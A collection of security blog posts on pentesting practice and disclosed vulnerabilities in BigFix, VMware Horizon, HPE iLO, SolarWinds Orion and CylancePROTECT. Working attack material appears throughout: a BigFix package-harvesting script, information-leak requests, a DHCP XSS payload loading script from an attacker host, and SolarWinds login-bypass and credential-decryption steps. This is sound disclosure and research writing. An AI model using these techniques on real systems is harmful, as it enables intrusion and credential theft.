Use the Source, Luke

Your pentesters should be asking for source code. And you should probably be sharing it.

One of my favorite things about working at Atredis Partners is that part of our research-centric model includes throwing folks at all kinds of targets that they've never seen before. First chairs on projects are always going to be in their comfort zone, but for second chairs, we like to mix things up a bit, because it helps folks grow and we often find new ways of looking at things that we've collectively looked at the same way for years.

This not only means that folks from traditional pentesting backgrounds get to grow into doing things like hardware or mobile hacking; it also means that I get to watch people with backgrounds in, say, reverse engineering or exploit development take a look at a network perimeter or a web app, which yields some great new perspectives.

Last week, I was on an internal kickoff call for what was ostensibly an assessment of an API on a public webserver. There were some other targets that were more complex than that, but for this part of the call, we were discussing testing the API. Two people on the team were coming at the target from a more bughunting-centric background, and were asking about how we'd be testing.

"So, are they gonna give us source code?"

"Probably not, they seemed pretty cagey about it. I can ask again, though..."

"That's stupid."

"I mean, I guess it kinda is. A lot of times we'll just get say, API docs, and some example code, maybe cobble together an API client to throw traffic at it, tool around with requests in Burp, that sort of thing."

"How about shell access to the server while you're testing so you can debug?"

"Uh, I dunno, like I said, these folks were pretty cagey about sharing much beyond access to the API itself."

"Jeez. Well, I guess they don't want us to find anything."

I was a bit dumbstruck at first, because a lot of the time, that's all you'll get for a web app or web services assessment: a couple of logins, maybe a walkthrough of the app, and then, well, yeah, actually... good luck finding anything. It was a useful reminder of how wrongheaded it is to be on the hook for finding all the bugs in something without source code.

We do ask for source, and shell access, for pretty much any software assessment we do. But we often get told no. Even more often than that, the client tells us "nobody's ever asked me that before."

And that is dumb.

Runtime testing alone is absolutely not the right way to find the most bugs possible, in the least amount of time, in pretty much any target. It's a way to find an opportunistic subset of the bugs that are floating at or very near the surface.

How likely is runtime testing to find more complex bugs several layers deep in the app, or that are only exploitable in a very narrow window in-session? What about finding the ten other places you're vulnerable to SSRF, all of which require a more complex trigger than the single case your tester found at runtime? How likely are your devs to fix every vector, when they only know about one? And how likely is it that a dev will find a way down the road to expose the other ten?

Source allows you to identify all kinds of systemic problems in an application that you just don't see when you're flinging yourself willy-nilly at a web interface or web service, or any software target, really. It allows you to confirm runtime findings and weed out false positives, and follow the bugs you found at runtime down into the bowels of the broken function or ugly third party library that spawned them.

So why don't more folks do source-driven or source-assisted pentests?

Well, for one thing, a lot of pentesters out there can't read the source in the first place, so it wouldn't help them much. You need more seasoned people, typically with some dev experience, to get any value out of sharing your source code. The last thing you want is a mountain of crappy informational bugs that somebody lifted wholesale out of a source code scanner report, trust me.

And yes, of course, there are the IP concerns. I get that. Folks will tell us their source code contains trade secrets, it's sensitive, it's HIPAA protected, it's export controlled, it's buried underground and written on stone tablets, etc, etc. I don't see IP problems as particularly insurmountable. They can be onerous, sure; we've flown overseas to look at code that couldn't leave a building, we've had devs scroll through source over Skype, sat in a locked room auditing source on client-provided systems with cameras on us, you name it. There are ways to give access to source in a controlled fashion, if source code leaving the building is a concern.

A third reason, related to the above, and I think the biggest one, is that it's more work for the testing team and for the client. The testing team has to add source review to their workflow, map the bugs they found at runtime back to source, and chase down bugs found in source to see if they're exploitable in the wild. On the client end, the client has to go wrangle devs for repo access (which the internal security team often doesn't even have themselves) and often has to figure out either how to get the testing team inside the corporate LAN, or how to schlep a 120MB tarball over to the tester.

It's far easier to just re-enable the "pentester1" and "pentester2" accounts from last year's test and get back to reading /r/agedlikemilk (which is pretty funny, to be fair). Besides, you're probably just going to rotate firms next year, so what's the point?

Seriously folks, if you have an in-house developed app, especially if it's part of your core business, you're wasting time on "black box" testing. Give your testing team full source access and full transparency, and they'll find bugs that have been missed by other teams doing runtime testing for years. I know this, because we do, every time a client takes us up on the request.

While I'm at it, let's dispense with the old saw that black box testing is so you can see "how long a real hacker would take to break this"... "Real" hackers get to take as long as they need to until they land a shell, plus they get to wear sunglasses, a hoodie and a ski mask while they do it. I have yet to have a client offer our team the luxury of unlimited time, and ski masks tend to make for awkward video calls with the CSO.

CVE-2019-4061: Harvesting Data from BigFix Relay Servers

External security assessments are one of my favorite parts of working at Atredis. I love the entire process: from sifting through mountains of data to identify the customer’s scope, to digging deep into commercial products that we find deployed on the perimeter, it is challenging work and a lot of fun.

A recent service of interest was an externally-exposed IBM BigFix Relay Server. This service provides an HTTP-over-TLS endpoint on TCP port 52311 that enables system administrators to deploy patches to devices outside their firewall, without forcing the use of a VPN. This is great when an update needs to be deployed that involves the VPN itself, but can be problematic from a security perspective.

After identifying an external BigFix Relay Server, Chris Bellows, Ryan Hanson, and I started to dig into the communications protocol between the relay and the client-side agent. We found that unauthenticated agents could enumerate and download almost all deployed packages, updates, and scripts hosted in the BigFix environment. In addition to data access, we also found a number of ways to gather information about the remote environment through the relay service.

The TL;DR of our advisory is that if BigFix is used with an external relay, Relay Authentication should be enabled. Not doing so exposes a ridiculous amount of information to unauthenticated external attackers, sometimes leading to a full remote compromise. Also note that an attacker who has access to the internal network or to an externally connected system with an authenticated agent can still access the BigFix data, even with Relay Authentication enabled. The best path to preventing a compromise through BigFix is to not include any sensitive content in uploaded packages. IBM also addresses this issue on the PSIRT blog.

BigFix uses something called a “masthead” to publish information about a given BigFix installation. The masthead is available on both normal and relay versions of BigFix at the URL https://[relay]:52311/masthead/masthead.axfm.

The masthead includes information such as the server IP, server name, port numbers, digital signatures, and license information, including the email address of the operator who licensed the product. This information can be immediately useful on its own, but it's just the tip of the iceberg.

BigFix uses a concept called Sites to organize assets. A full index of configured Sites can be obtained through the URL https://[relay]:52311/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands. This site listing provides deep visibility into the organization’s internal structure.

Going further, an attacker can obtain a list of package names and versions by requesting the URL https://[relay]:52311/cgi-bin/bfenterprise/BESMirrorRequest.exe. This tells an attacker exactly what versions of what software are installed across the organization. The package list is split into specific Actions, each of which has the following format:

Action: 21421

url 1: http://[BigFixServer.Corporate.Example]:52311/Desktop/CreateLocalAdmin.ps1

url 2: http://[BigFixServer.Corporate.Example]:52311/Desktop/SetBIOSPassword.ps1

In order to download package contents from a relay, the package must first be refreshed in the mirror cache. This can be accomplished by requesting sub-URL ID "0" for the given Action ID: https://[relay]/bfmirror/downloads/[action]/0

Once the data has been cached, individual sub-URLs may be downloaded by ID: https://[relay]/bfmirror/downloads/[action]/1

Automating the process above is straightforward and allows an attacker to obtain copies of the published packages. As hinted above, sometimes these packages include sensitive data, and sometimes this data can be used to directly compromise the organization.
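As a rough illustration, automating this in Ruby might look something like the sketch below. The relay hostname is a placeholder, certificate verification is disabled because relay certificates are rarely trusted by testing hosts, and the parsing is deliberately simplified (real Actions may expose more than one sub-URL):

require 'net/http'
require 'openssl'
require 'uri'

RELAY = "relay.corporate.example"   # placeholder relay hostname

def fetch(path)
  uri  = URI("https://#{RELAY}:52311#{path}")
  http = Net::HTTP.new(uri.host, uri.port)
  http.use_ssl = true
  http.verify_mode = OpenSSL::SSL::VERIFY_NONE  # relay certs are usually self-signed
  http.get(uri.request_uri).body
end

# Enumerate Action IDs from the mirror request listing
listing = fetch("/cgi-bin/bfenterprise/BESMirrorRequest.exe")
actions = listing.scan(/^Action: (\d+)/).flatten.uniq

actions.each do |action|
  fetch("/bfmirror/downloads/#{action}/0")          # refresh the mirror cache
  data = fetch("/bfmirror/downloads/#{action}/1")   # grab the first sub-URL
  File.binwrite("action-#{action}-1.bin", data)
end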

In order to determine how common this issue was, we conducted an internet-wide survey of the IPv4 space, looking for the BigFix masthead file on externally exposed relay servers. Of the ~3.7 billion addressable IPv4 addresses, we found almost 1,500 BigFix Relay servers with Relay Authentication disabled. This list included numerous government organizations, large multinational corporations, health care providers, universities, insurers, major retailers, and financial service providers, along with a healthy number of technology firms. For each identified relay, we queried the masthead and obtained a package list, but did not download any package data.

Shortly after conducting the survey, we reached out to the BigFix product team to start the vulnerability coordination process. The BigFix team has been great to work with; quick to respond and interested in the best outcome for their customers. Over the last three months, the BigFix team has improved their documentation and notified affected customers. As of March 18th, that process has been completed.

In total, our survey found 1,458 exposed BigFix Relay Servers, with versions 9.5.10.79, 9.5.9.62, and 9.5.8.38 being the most common. Looking at just “uploaded” packages (custom things uploaded into BigFix by operators), we identified over 25,000 unique files.

Quite a few of these uploaded files appear to contain sensitive data, based on their filenames alone:

Encryption and authentication keys:

  • bitlockerADkey.ps1

  • SSH_KEYtar.tmp

  • AES.key

  • _BC4Key.txt

Scripts to set the administrator password:

  • secChangeadminpsw.bat

  • localadmin_pw.bat

  • AddWorkstationAdmins.bat

  • AdminPassword.exe

  • change_admin_password.exe.tmp

  • SetConfigPasswordRemote.vbs

In summary, anyone using BigFix with external Relay Servers should enable Relay Authentication as soon as possible. All BigFix users should review their deployed packages and verify that no sensitive information is exposed, including encryption keys and scripts that set hardcoded passwords. Finally, for folks conducting security assessments, keep an eye out for port 52311 on both internet-facing and internal networks.

-HD

CVE-2019-5513: Information Leaks in VMware Horizon

The VMware Horizon Connection Server is often used as an internet-facing gateway to an organization’s virtual desktop infrastructure (VDI). Until recently, most of these installations exposed the Connection Server’s internal name, the gateway’s internal IP address, and the Active Directory domain to unauthenticated attackers.

Information leaks like these are not a huge risk on their own, but combined with more significant vulnerabilities they can make a remote compromise easier. I love these kinds of bugs because they provide a view through the corporate firewall into the internal infrastructure, providing insight into naming and addressing conventions.

The Atredis advisory and the VMware advisory are now online and contain additional details about the issues and available fixes.

Testing for these issues is straightforward; the following request to the /portal/info.jsp endpoint will return one or more internal IP addresses along with a version number:

$ curl https://host/portal/info.jsp
{"acceptLanguage":"en-US","clientVersion":"4.9.0","logLevel":"2","clientIPAddress":"192.168.0.12, 192.168.30.45","contextPath":"/portal","feature":{},"os":"unknown","installerLink":"https://www.vmware.com/go/viewclients"}

A POST request to the /broker/xml endpoint returns the broker-service-principal element in the XML response, which contains the service account name (typically a machine account) and the domain name:

$ curl -k -s -XPOST -H 'Content-Type: text/xml' https://host/broker/xml --data-binary $'<?xml version=\'1.0\' encoding=\'UTF-8\'?><broker version=\'10.0\'><get-configuration></get-configuration></broker>'

<broker-service-principal>
<type>kerberos</type>
<name>HORIZONSERVER$@CORPORATEDOMAIN.EXAMPLE.COM</name>
</broker-service-principal>
</configuration>
</broker>

We would like to thank the VMware Security Response Center for their pleasant handling of this vulnerability report and their excellent communication. VMware noted that this issue was also independently reported by Cory Mathews of Critical Start.

CVE-2018-7117: A Somewhat Accidental XSS in HPE iLO

INTRODUCTION

At Atredis Partners, we often use dedicated lab networks for testing devices. This helps isolate these devices from "production" networks, and affords us the opportunity to monitor all network communications to/from the device as well as conduct interesting attacks. In this post, we'll briefly discuss a somewhat unexpected find shortly after plugging in an enterprise-grade server during an engagement a few months ago.

(You can also jump straight to the advisory we released today)

THE DEVICE AND THE BUG

I'd like to tell you this was some unique, esoteric device with some incredibly amazing, difficult-to-find, l33t bug ... but I'd be lying. Instead, this device was an HPE ProLiant DL380 Gen10 server, which is fairly common in many enterprise environments; and the bug was ... Cross-Site Scripting.

Now, before the "XSS is lame" chest-beating begins, bear in mind this bug was found not in a web application running on the host operating system, but rather in the Integrated Lights-Out (or "iLO") side of things. For those unfamiliar, HPE iLO gives system and network administrators the ability to manage and monitor servers through a separate, dedicated network interface, API, and UI. Typical iLO capabilities include, but are not limited to, checking system hardware health, managing device power options (including turning the device on/off), mounting drive images, and even a remote console (although some "enhanced" versions of iLO further restrict access to this and other features).

Once the server was hooked up to the lab network and ready to go, we began poking and prodding all over the place, including the iLO web UI. After logging in and browsing around, familiarizing ourselves with the interface, identifying input points, etc., my colleague messaged me, asking "Did you do this?":

[Screenshot: xss-1.png]

Admittedly, I was a bit amused by this whole thing because 1) it was a bit of an unexpected discovery and 2) the lab network is configured to "automagically" help test for this and other, similar issues, so it's become almost hands-off or even second nature.

I quickly realized this was the result of how this lab network's DHCP server was configured -- providing different values for DHCP options so as to identify (and even trigger) XSS, command injection and the like in vulnerable clients.

Digging in a wee bit further, we realized it was the domain name (DHCP option 15) that was being rendered unsanitized in the iLO web UI.

[Screenshot: xss-3.png]

We adjusted the DHCP server configuration to do a bit more than just alert(1), and forced the iLO to pull a new lease, resulting in:

[Screenshot: xss-2.png]

IMPACT AND OTHER CONSIDERATIONS

While the DHCP-provided "domain name" value could contain a simple HTML <script> tag that merely pops a JavaScript alert box in the authenticated user's browser, an attacker could also specify an external JavaScript resource, providing greater opportunities and capabilities.

That said, there are some things to think about in terms of the real world impact here.

For starters, security best practices, including those straight from HPE, dictate that out-of-band management networks should be connected to a "dedicated management network that is isolated from the production network", though this may not always be implemented correctly, if at all. This means that an attacker would need to be network-adjacent to the target(s), either by gaining a foothold on a device connected to that network or by way of a rogue insider, in order to spin up a specially configured DHCP server.

Second, at least for this specific issue, the target iLO(s) would need to be configured to use DHCP, although this is the default.

Third, although slightly less important, egress filtering rules would potentially need to allow devices in the management network to contact external hosts, i.e. to pull external JavaScript and/or exfiltrate data. I say "slightly less important" because it isn't out of the realm of possibility to host JavaScript resources on/transmit captured data within the management network itself, assuming the attacker already has a foothold there.

CONCLUSION

Belated TL;DR: don't underestimate the power of having a lab environment configured for identifying these kinds of injection issues from the get-go, as you never know what you may find, even in what may seem to be an otherwise robust and "secure" platform.

For those who want to perform this kind of testing themselves, there are myriad ways to do so, such as simply configuring your DHCP server-of-choice to dole out "malicious" values in DHCP options, or using freely available tools (or writing your own) to handle the task. The latter could be anything from a Metasploit module to a modified version of pydhcp.
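For example, if dnsmasq happens to be the lab DHCP server of choice, a configuration along the lines of the snippet below (the address range and payload host are placeholders) will hand out a hostile domain name via DHCP option 15. Any client that renders the received domain name unsanitized, as the iLO web UI did here, ends up loading the referenced script in the context of an authenticated session:

# dnsmasq.conf excerpt: serve a hostile domain name (DHCP option 15) to lab clients
dhcp-range=10.0.0.50,10.0.0.150,12h
dhcp-option=option:domain-name,"<script src=//attacker.lab.example/ilo.js></script>"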

Fun with SolarWinds Orion Cryptography

Introduction

We run into a wide variety of network management solutions during our security assessments and penetration tests. The SolarWinds Orion product suite in particular is popular with network administrators and IT teams of all sizes. The Orion platform includes modules such as the Network Engineers Toolkit, Web Performance Monitor, and Network Configuration Management, among many others. We found some fun ways to abuse this product during security tests and wanted to share our notes with the community.

The Orion product uses a Microsoft SQL Server backend to store information about user accounts, network devices, and the credentials used to manage these devices. An Orion system used to manage a large network will typically use a standalone SQL Server installation, while smaller networks will use a local SQL Server Express instance. Since the Orion server houses credentials and can often be used to push and pull network device configurations, it can be a gold mine for expanding access during a penetration test.

Gaining access to the web console without a login

The Orion product is typically managed from the web console, which can authenticate against a local account database or an existing Active Directory service. An attacker who can monitor network traffic between the Orion server and a separate SQL Server instance can extract hashed user passwords and encrypted network device credentials. An attacker who can man-in-the-middle the SQL Server communication can log in to the Orion web console with an arbitrary password by replacing the password hash when the web server queries the Accounts table during login.

If direct access to the Orion SQL Server database is possible, a modification to the Accounts table will allow for easy access to the console. If the attacker has local administrator access to the Orion server, they can modify the Accounts table using the Orion Database Manager GUI application. Regardless of how an attacker gains access to the Accounts table, the easiest approach is to back up the existing hash, then replace the PasswordHash column for an enabled administrative user. The hash of an empty password for the "admin" user account is the following string:

/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==

Note that this password hash is only valid for the "admin" user (see notes below on salting). The screenshot below shows the SQL query to reset the "admin" account to the empty password, using the SolarWinds Database Manager GUI (via local administrator access over Remote Desktop).

[Screenshot: Replace_PasswordHash.png]
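In text form, the query is roughly the following; the Username and PasswordHash column names are taken from the Accounts table listing later in this post, and the exact schema may differ between Orion versions:

UPDATE Accounts
SET PasswordHash = '/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg=='
WHERE Username = 'admin';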

Once the PasswordHash has been replaced (or temporarily intercepted), the attacker can log in with an empty password for the associated user account.

 

SolarWinds Orion "Accounts" table password hashing

Orion password hashing is a variant of a salted SHA512 hash. The hash is computed by first generating a salt that consists of the lowercase username. If the salt is less than 8 bytes long, it is appended with bytes from the string "1244352345234" until it is 8 bytes. For example, the salt for username "ADMIN" would become "admin124", while the salt for "Bo" would become "bo124435". Once the salt has been calculated, an RFC 2898 PBKDF2 key is derived using the default iteration count of 1000 and the SHA1 hash algorithm. Finally, a SHA512 hash of the PBKDF2 output is taken and encoded using Base64. It doesn't appear that any existing tools support cracking passwords in this format; Hashcat comes close with PBKDF2-HMAC-SHA1(sha1:1000) support, but is missing the final call to SHA512(). This hashing function has been implemented in the Ruby script hash-password.rb.
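For reference, a minimal Ruby sketch of this scheme is shown below. The PBKDF2 derived-key length is not specified above, so the 1024-byte value used here is an assumption; hash-password.rb remains the reference implementation:

require 'openssl'
require 'base64'

# Sketch of the Orion "Accounts" table hashing described above.
# NOTE: the PBKDF2 derived-key length (1024 bytes) is an assumption.
def orion_hash(username, password)
  salt = username.downcase
  salt = (salt + "1244352345234")[0, 8] if salt.length < 8
  key  = OpenSSL::PKCS5.pbkdf2_hmac_sha1(password, salt, 1000, 1024)
  Base64.strict_encode64(OpenSSL::Digest::SHA512.digest(key))
end

puts orion_hash("admin", "")   # compare against the empty-password hash shown earlier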

 

Harvesting stored network credentials from the database

SolarWinds Orion stores network credentials within the SQL Server database tables. Some of these credentials, such as SNMP v1/v2c community strings, are stored in clear-text, while most are encrypted using an RSA key located in the Orion server's local certificate store. Network credentials can be harvested from the database through passive monitoring or active exports; in the latter case, either by using standard SQL Server management tools or, if local administrator access has been obtained on the Orion server, by using the Database Manager GUI application. A partial list of tables that should be exported to collect credentials includes:

  • Accounts (Username, PasswordHash)

  • Credential (ID, Name)

  • CredentialProperty (ID, Name, Value)

  • Nodes (IPAddress, Community, RWCommunity)

  • NCM_Nodes [View] (Name, Username, Password, EnableLevel, EnablePassword)

  • NCM_GlobalSettings (SettingName, SettingValue)

  • NCM_NodeProperties (Username, Password, EnableLevel, EnablePassword)

  • NCM_ConfigSnippets (AdvancedScript)

  • NCM_ConnectionProfiles (Name, Username, Password, EnableLevel, EnablePassword)

  • SSH_Sessions (HostName, Username, Password)

  • SSO_Tokens

  • Traps (Community)

  • CommunityStrings (Community)

Decrypting stored network credentials

Network credentials stored within the SQL Server database are encrypted with an RSA key located in the local machine certificate store of the Orion server. For most SQL tables, these credentials are prefixed with the string "SWEN__", while the SSH sessions table uses a raw form without the prefix. To decrypt these credentials, the RSA key for the SolarWinds-Orion certificate must be exported from the system. This typically requires local administrator access and an elevated command shell on the Orion server. To export the key, use certutil:

C:\Temp> certutil -exportPFX -p Atredis my SolarWinds-Orion orion.pfx
my "Personal"
================ Certificate 0 ================
Serial Number: c0e0b5d49a84818048d614012d6c7497
Issuer: CN=SolarWinds-Orion
 NotBefore: 10/21/2018 6:26 PM
 NotAfter: 12/31/2039 6:59 PM
Subject: CN=SolarWinds-Orion
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): e60003315dd42f55adeb7f4c2071b6e9bc9dd996
  Key Container = 9292e92a-9fb9-4881-94cd-c8c582550268
  Unique container name: 7f96c35203d32d4fae1724bb52f38232_c5c554db-595b-4464-ac33-102a5379ad51
  Provider = Microsoft Strong Cryptographic Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.

If an error is returned stating “Keyset does not exist”, this typically means that the command was not run as an administrative user with elevated privileges. If certutil does not work for some reason, or if the cert has been marked unexportable, you can still export the private key using Jailbreak or Mimikatz.

Next, the PFX needs to be converted to a standard OpenSSL PEM file. The openssl command handles this with the following syntax: 

C:\Temp> openssl pkcs12 -in orion.pfx -out orion.pem -nodes -password pass:Atredis

Using the clear-text orion.pem file, the credentials in the exported database tables can be decrypted using the Ruby scripts decrypt-swen-credentials.rb and decrypt-ssh-sessions.rb. These scripts will read the RSA key from “orion.pem” and decrypt credentials found in all files passed as arguments, saving the results to files with the “.dec” extension. The Database Manager GUI includes a handy “Export to CSV” button that simplifies this process. The decrypt-ssh-sessions.rb script looks for the password fields in the SSH_Sessions table, which does not use the “SWEN” prefix. The following example demonstrates using the decrypt-swen-credentials.rb script against an export of the NCM_GlobalSettings table.

$ ruby decrypt-swen-credentials.rb NCM_GlobalSettings.csv 
$ cat NCM_GlobalSettings.csv.dec
"SettingName","SettingValue"
"GlobalConfigRequestProtocol","SNMP"
"GlobalConfigTransferProtocol","TFTP"
"GlobalEnableLevel","enable"
"GlobalEnablePassword","ubersecret!"
"GlobalExecProtocol","SSH auto"
"GlobalPassword","secret!"
"GlobalSSHPort","22"
"GlobalTelnetPort","23"
"GlobalUsername","solarwinds"

Conclusion

The SolarWinds Orion platform is a lot of fun for penetration testers, as it can act as a credential store, configuration management system, and remote command execution platform, depending on what modules are configured. As an added bonus, highly segmented networks often whitelist their network monitoring servers, making the SolarWinds server an attractive target for lateral movement. Although the password hashing and credential encryption are relatively sane from a security standpoint, they can be abused with the right tools. I hope the information above is useful and convinces you to pay special attention to network monitoring applications on your next penetration test.

-HD

Revolving Door Pentesting

I recently had a client ask me if it makes sense to rotate security testing firms. "It's something I've always done, but I'm not sure if it really works or not."

I said in my experience, it doesn't really work very well at all.

I run into it less now than I did ten years ago, but there are still quite a few folks out there using a different firm for each annual pentest, or who never use the same firm on the same target more than once and keep a rotating roster of firms in the hopper.

What blows my mind about the whole switch-vendors-every-year mentality is that it's built around the presumption that most pentesters are terrible (plausible, in some cases) and are only going to try hard when you're a new client. There's also a perception that there's no value in building an ongoing relationship with a firm, since everyone does the same things, in the same order, to the same target every time.

On any of our engagements, the first time we look at a given target, we have to ramp up and learn everything we can about it: what mistakes your developers are more prone to make, what misconfigurations you made in your EDR deployment, how to keep from knocking the staging environment offline, which sysadmin knows how to bring it back up. The list goes on and on.

The early phases of a new assessment for a new client are a lot like the first few days on the job for a new employee. You won't really see productive results until they've learned the ropes a bit and have a handle on how things work (and don't work) in your environment.

You need to keep working with a pentest firm once they've ramped up on your environment for the same reason you need to keep employees: they've learned valuable things that someone new would have to relearn, and that's a poor use of time and resources if you have a seasoned person on hand to do the job.

When they wrap that first gig, a good pentester is already thinking about different and better ways to go after the target next time.

On the other side of things, if you're rotating firms over and over, and you don't see any value in follow-on projects, maybe you're not investing in the relationship yourself. Heck, maybe you don't even want to, maybe you just want another annual rotated-firm rubber-stamp assessment to keep the auditors happy. Maybe you're even cynical enough to admit that if you let the same firm hit the same targets two years in a row somebody would finally figure out how to get past the WAF and then you'd have a lot more work to do.

I've had people proudly say to me, "we have new people hit this every year and they find the same bugs". What they don't seem to understand is that it also follows that if you use the same people again, they'll most likely find new bugs. Or, if you really need "fresh eyes", use different resources from a firm you already trust.

To me, the goal of pentesting is to push things forward, or it should be: to iteratively test and improve a little each time, both as attackers and defenders. The best way to do that is to get attackers and defenders collaborating. Building a longstanding working relationship is a great way to do that.

Escalating Privileges with CylancePROTECT


CylancePROTECT contains a privilege escalation vulnerability due to the update service granting the Users group Modify permissions on its log folder, as well as on any log file it writes. This allows any user to empty the folder and use it as a mount point, which can be combined with a symbolic link to create an arbitrary file with Modify permissions when a new log file is created.